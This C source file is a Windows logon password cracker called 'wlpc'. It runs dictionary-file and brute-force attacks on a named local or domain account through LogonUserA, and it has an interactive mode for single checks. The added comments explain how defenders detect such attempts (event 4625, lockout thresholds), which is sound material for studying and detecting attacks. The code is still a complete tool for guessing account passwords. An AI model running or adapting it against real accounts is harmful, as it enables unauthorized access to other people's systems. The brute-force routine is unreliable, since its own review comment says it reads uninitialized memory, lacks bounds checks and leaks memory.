#include <Windows.h>
#include <conio.h>
#include <cctype>
#include <cstdarg>
#include <cstdio>
#include <cstdlib>
#include <cstring>
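/**
 * Print a printf-style message to stderr and terminate with exit status 1.
 *
 * @param format printf-style format string; every caller in this file passes
 *               a string literal, never user-controlled text.
 * @param ...    arguments consumed by the format string.
 */
void die(const char* format, ...) {
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);  // va_start must be paired with va_end before leaving the function
    exit(1);
}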
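/**
 * Ask Windows to validate one user/password/domain triple via LogonUserA,
 * using a network logon (LOGON32_LOGON_NETWORK) and the default provider.
 *
 * Defender note: every call is a real authentication attempt. When
 * logon-failure auditing is enabled, rejected attempts are recorded in the
 * Security log (event 4625, logon type 3 for network logons) and they count
 * toward the account lockout threshold, so a run of calls from one host
 * against one account is the pattern to alert on.
 *
 * @param user    account name.
 * @param pass    password to test.
 * @param domain  domain or server name; "." selects the local machine.
 * @param showmsg when true, print "Success!" or the system error text.
 * @return 1 on success. On failure: 0 when showmsg is false, otherwise the
 *         GetLastError() code (non-zero), so callers that test the result as
 *         a boolean must pass showmsg == false.
 */
int logon(const char* user, const char* pass, const char* domain, bool showmsg) {
    HANDLE tok = NULL;

    if (LogonUserA(user, domain, pass, LOGON32_LOGON_NETWORK,
                   LOGON32_PROVIDER_DEFAULT, &tok)) {
        if (showmsg) puts("Success!");
        // The token only exists after a successful logon; close it here and
        // nowhere else so an uninitialized handle is never passed to CloseHandle.
        CloseHandle(tok);
        return 1;
    }

    if (!showmsg) return 0;

    // Capture the error before any other API call can overwrite it.
    DWORD err = GetLastError();
    char* msg = NULL;
    DWORD len = FormatMessageA(
        FORMAT_MESSAGE_ALLOCATE_BUFFER |
        FORMAT_MESSAGE_FROM_SYSTEM |
        FORMAT_MESSAGE_IGNORE_INSERTS,
        NULL,
        err,
        0,
        (LPSTR)&msg,  // with ALLOCATE_BUFFER the API stores the buffer pointer here
        0, NULL
    );
    if (len != 0 && msg != NULL) {
        puts(msg);
        LocalFree(msg);
    } else {
        // FormatMessageA left msg unset; fall back to the numeric code.
        printf("Logon failed (error %lu)\n", (unsigned long)err);
    }
    return (int)err;
}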
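/**
 * Interactive mode: read one-letter commands from stdin to set the domain,
 * user and password, and test that single credential with logon().
 *
 * Every field lives in a fixed 256-byte buffer and all copies are bounded;
 * over-long input is truncated instead of overflowing. The loop ends on the
 * 'q' command or on end of input.
 */
void prompt() {
    enum { FIELD_MAX = 256 };
    char domain[FIELD_MAX] = ".";  // "." means the local machine
    char user[FIELD_MAX] = "";
    char pass[FIELD_MAX] = "";
    char input[FIELD_MAX];

    for (;;) {
        fputs("-", stdout);
        fflush(stdout);

        // fgets bounds the read; gets() has no length limit at all.
        if (!fgets(input, sizeof input, stdin)) break;

        size_t eol = strcspn(input, "\r\n");
        if (input[eol] == 0 && !feof(stdin)) {
            // Line was longer than the buffer: discard the tail so it is not
            // interpreted as the next command.
            int c;
            while ((c = getchar()) != '\n' && c != EOF) {}
        }
        input[eol] = 0;

        // Commands look like "c ARG"; a line shorter than that has no argument.
        const char* arg = (input[0] && input[1]) ? input + 2 : "";

        switch (input[0]) {
        case '?':
            puts(
                "Interactive mode commands:\n"
                "d DOMAIN Set domain (Use \".\" for local machine)\n"
                "u USER Set username\n"
                "p PASS Set password\n"
                "x Attempt logon\n"
                "q Quit\n"
            );
            break;
        case 'd': snprintf(domain, sizeof domain, "%s", arg); break;
        case 'u': snprintf(user, sizeof user, "%s", arg); break;
        case 'p': snprintf(pass, sizeof pass, "%s", arg); break;
        case 'x': logon(user, pass, domain, true); break;
        case 'q':
            // Do not leave the typed password in memory after returning.
            SecureZeroMemory(pass, sizeof pass);
            SecureZeroMemory(input, sizeof input);
            return;
        default: puts("Unknown command\n");
        }
    }

    SecureZeroMemory(pass, sizeof pass);
    SecureZeroMemory(input, sizeof input);
}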
/**
 * Character classes selected on the command line. main() zero-fills the
 * structure and sets one flag per switch it sees.
 */
struct pass_type {
    bool lcase;  // set by -l: 'a'..'z'
    bool ucase;  // set by -u: 'A'..'Z'
    bool digit;  // set by -n: '0'..'9'
    bool punct;  // set by -p: characters for which ispunct() is true
    bool space;  // set by -s: the space character
};
/**
 * Build a character set from the selected classes and submit candidates to
 * logon() one at a time until one is accepted or Enter is pressed.
 *
 * Defender note: each candidate is a separate LogonUserA attempt made by
 * logon(), so account lockout thresholds and failed-logon auditing are the
 * controls that bound and reveal this loop.
 *
 * NOTE(review): memory-safety hazards left unchanged in this block:
 *   - the scan that computes `last` runs before the terminator is written,
 *     so it reads uninitialized heap bytes;
 *   - malloc results are never checked;
 *   - `candidate` grows without a bound check against its 256 bytes;
 *   - with no class selected the character set is empty;
 *   - both buffers are leaked on the success path.
 *
 * @param user   account name passed through to logon().
 * @param ptype  character classes to include.
 * @param domain domain or server name passed through to logon().
 */
void brute(const char* user, struct pass_type * ptype, const char* domain) {
    char c;
    char pos;
    int n = 0;
    int last = 0;
    bool carry;
    char* charset = (char*)malloc(100);
    char* candidate = (char*)malloc(256);

    // Class order is fixed: lowercase, digits, space, uppercase, punctuation.
    if (ptype->lcase) {
        for (c = 'a'; c <= 'z'; c++) charset[n++] = c;
    }
    if (ptype->digit) {
        for (c = '0'; c <= '9'; c++) charset[n++] = c;
    }
    if (ptype->space) {
        charset[n++] = ' ';
    }
    if (ptype->ucase) {
        for (c = 'A'; c <= 'Z'; c++) charset[n++] = c;
    }
    if (ptype->punct) {
        for (c = 0x21; c < 0x7f; c++) {
            if (ispunct(c)) charset[n++] = c;
        }
    }

    // Index of the last character in the set (see NOTE(review) above: the
    // terminator is only written on the following line).
    while (charset[last]) last++;
    last--;
    charset[n] = 0;

    candidate[0] = charset[0];
    candidate[1] = 0;

    puts("Press Enter anytime to stop. . .");
    Sleep(1000);

    for (;;) {
        puts(candidate);
        if (logon(user, candidate, domain, false)) break;

        if (_kbhit() && _getch() == '\r') {
            free(charset);
            free(candidate);
            puts("\nStopped.");
            return;
        }

        // Advance the candidate like an odometer, lowest position first.
        pos = 0;
        do {
            if (candidate[pos] != charset[last]) {
                carry = false;
                candidate[pos] = strchr(charset, candidate[pos])[1];
                break;
            }
            carry = true;
            candidate[pos] = charset[0];
        } while (candidate[++pos]);

        if (carry) {
            // Every position wrapped: lengthen the candidate by one character.
            int len = strlen(candidate);
            candidate[len] = charset[0];
            candidate[len + 1] = 0;
        }
    }

    puts("\nSuccess!");
    return;
}
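/**
 * Entry point: print usage, run interactive mode, or run one of the two
 * batch modes against the account named by argv[1].
 *
 * Argument handling is validated before use: options that take a value must
 * be followed by one, and wordfile mode requires -w. The batch loops call
 * logon() once per candidate, so each iteration is a real authentication
 * attempt that Windows can audit and count toward account lockout.
 *
 * @return 0 on every normal path; die() exits with status 1 on usage errors.
 */
int main(int argc, char ** argv) {
    if (argc == 1)
        die(
            "wlpc - by Jakash3\n"
            "Windows Logon Password Cracker\n"
            // Synopsis corrected to -n: the option table below and the parser
            // use -n for digits, while -d always means "domain".
            "Usage: %s [username [-w wordfile | -b [-l -u -n -p -s]] [-d domain]] | -i \n\n"
            "-w wordfile Dictionary attack. Using file containing line by line passwords\n"
            "-b Bruteforce attack using one or more of the following switches:\n"
            " -l Include lowercase alphabetical characters.\n"
            " -u Include uppercase alphabetical characters.\n"
            " -n Include digit characters\n"
            " -p Include punctuation characters\n"
            " -s Include space\n"
            "username Name of user account to try logging in as\n"
            "-d domain Optional. Remote Domain or server holding the user account\n"
            "-i Interactive mode\n", argv[0]
        );
    if (argc == 2 && !strcmp(argv[1], "-i")) { prompt(); return 0; }

    const char* domain = ".";
    const char* wfile = NULL;  // stays NULL unless -w supplies a path
    bool bf = false;
    struct pass_type p;
    memset(&p, 0, sizeof p);

    for (int i = 1; i < argc; i++) {
        if (!strcmp(argv[i], "-d")) {
            // Never read past the end of argv for an option value.
            if (++i >= argc) die("Option -d requires a domain\n");
            domain = argv[i];
        }
        else if (!strcmp(argv[i], "-i")) { prompt(); return 0; }
        else if (!strcmp(argv[i], "-w")) {
            if (++i >= argc) die("Option -w requires a wordfile\n");
            wfile = argv[i];
        }
        else if (!strcmp(argv[i], "-b")) bf = true;
        else if (!strcmp(argv[i], "-l")) p.lcase = true;
        else if (!strcmp(argv[i], "-u")) p.ucase = true;
        else if (!strcmp(argv[i], "-n")) p.digit = true;
        else if (!strcmp(argv[i], "-p")) p.punct = true;
        else if (!strcmp(argv[i], "-s")) p.space = true;
    }

    if (bf) { brute(argv[1], &p, domain); return 0; }

    // Without -w there is no path to open; the pointer must not be used.
    if (!wfile) die("No wordfile given; use -w wordfile, -b or -i\n");

    FILE* f = fopen(wfile, "r");
    if (!f) die("Failed to open %s\n", wfile);

    // Single allocation, checked before use.
    char* pass = (char*)malloc(256);
    if (!pass) {
        fclose(f);
        die("Out of memory\n");
    }

    puts("Press Enter anytime to stop. . .");
    Sleep(1000);

    const char* verdict = "\nEnd of file!";
    for (;;) {
        if (_kbhit() && _getch() == '\r') {
            verdict = "\nStopped.";
            break;
        }
        if (!fgets(pass, 256, f)) break;

        // strcspn returns the string length when no line ending is present,
        // so a final line without a newline cannot cause a NULL dereference.
        pass[strcspn(pass, "\r\n")] = 0;

        puts(pass);
        if (logon(argv[1], pass, domain, false)) {
            verdict = "\nSuccess!";
            break;
        }
    }

    puts(verdict);
    fclose(f);
    free(pass);
    return 0;
}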